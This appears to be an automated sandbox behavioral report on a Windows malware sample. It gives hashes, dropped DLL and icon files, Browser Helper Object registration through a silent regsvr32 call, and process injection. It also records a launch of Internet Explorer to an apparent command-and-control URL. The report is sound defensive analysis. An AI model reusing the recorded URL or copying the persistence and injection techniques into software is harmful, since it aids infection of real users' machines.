Analysis
max time kernel: 122s
max time network: 127s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 04/02/2024, 19:42

Behavioral task: behavioral1
Sample: 8ffcef8076920d374af454c1f3b406f9.exe
Resource: win7-20231215-en

General
Target: 8ffcef8076920d374af454c1f3b406f9.exe
Size: 153KB
MD5: 8ffcef8076920d374af454c1f3b406f9
SHA1: 958bceda667365dc5700d75705afb52b34172872
SHA256: c18f66b20db148aff2ff1bc3e2b6634cc8f6f6ed6842fa17839ef435a4ec3d84
SHA512: 67d3121dc1e148af04fafceb101db34f34648ac2907d67888bc57c3334c2ef95fa89a42015b9368b334e9f1e4ad81ffac72b32820a502924f4420a4682e3cc39
SSDEEP: 3072:QvxetzT1kBMjoQWJQEnUJPIH1TsNyI6SLtA8vIaiM:yI1kCodm6KPuYNyPSLtlqM
Malware Config
Signatures
Loads dropped DLL 1 IoCs
pid Process
3000 regsvr32.exe

resource yara_rule
behavioral1/memory/2372-0-0x0000000000400000-0x0000000000470000-memory.dmp upx
behavioral1/memory/2372-29-0x0000000000400000-0x0000000000470000-memory.dmp upx
Installs/modifies Browser Helper Object 2 TTPs 1 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} regsvr32.exe
Drops file in System32 directory 7 IoCs
description ioc Process
File created C:\Windows\SysWOW64\eyfwin.dll 8ffcef8076920d374af454c1f3b406f9.exe
File created C:\Windows\SysWOW64\p.ico 8ffcef8076920d374af454c1f3b406f9.exe
File created C:\Windows\SysWOW64\sf.ico 8ffcef8076920d374af454c1f3b406f9.exe
File created C:\Windows\SysWOW64\c.ico 8ffcef8076920d374af454c1f3b406f9.exe
File created C:\Windows\SysWOW64\m.ico 8ffcef8076920d374af454c1f3b406f9.exe
File created C:\Windows\SysWOW64\m3.ico 8ffcef8076920d374af454c1f3b406f9.exe
File created C:\Windows\SysWOW64\s.ico 8ffcef8076920d374af454c1f3b406f9.exe
Drops file in Windows directory 1 IoCs
description ioc Process
File created C:\Windows\ios.dat 8ffcef8076920d374af454c1f3b406f9.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Modifies Internet Explorer settings
Modifies registry class 60 IoCs
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process
2780 iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs
pid Process
2780 iexplore.exe
2780 iexplore.exe
2824 IEXPLORE.EXE
2824 IEXPLORE.EXE
2824 IEXPLORE.EXE
2824 IEXPLORE.EXE

Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target
PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28
PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28
PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28
PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28
PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28
PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28
PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28
PID 2372 wrote to memory of 2780 2372 8ffcef8076920d374af454c1f3b406f9.exe 29
PID 2372 wrote to memory of 2780 2372 8ffcef8076920d374af454c1f3b406f9.exe 29
PID 2372 wrote to memory of 2780 2372 8ffcef8076920d374af454c1f3b406f9.exe 29
PID 2372 wrote to memory of 2780 2372 8ffcef8076920d374af454c1f3b406f9.exe 29
PID 2780 wrote to memory of 2824 2780 iexplore.exe 30
PID 2780 wrote to memory of 2824 2780 iexplore.exe 30
PID 2780 wrote to memory of 2824 2780 iexplore.exe 30
PID 2780 wrote to memory of 2824 2780 iexplore.exe 30
Processes
C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe"
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID: 2372

    C:\Windows\SysWOW64\regsvr32.exe
      Command line: "C:\Windows\System32\regsvr32.exe" /s C:\Windows\system32\eyfwin.dll
      - Loads dropped DLL
      - Installs/modifies Browser Helper Object
      - Modifies registry class
      PID: 3000

    C:\Program Files\Internet Explorer\iexplore.exe
      Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://configupdatestart.com/bind2.php?id=3913842
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID: 2780

        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:275457 /prefetch:2
          - Modifies Internet Explorer settings
          - Suspicious use of SetWindowsHookEx
          PID: 2824
Network
MITRE ATT&CK Enterprise v15
Downloads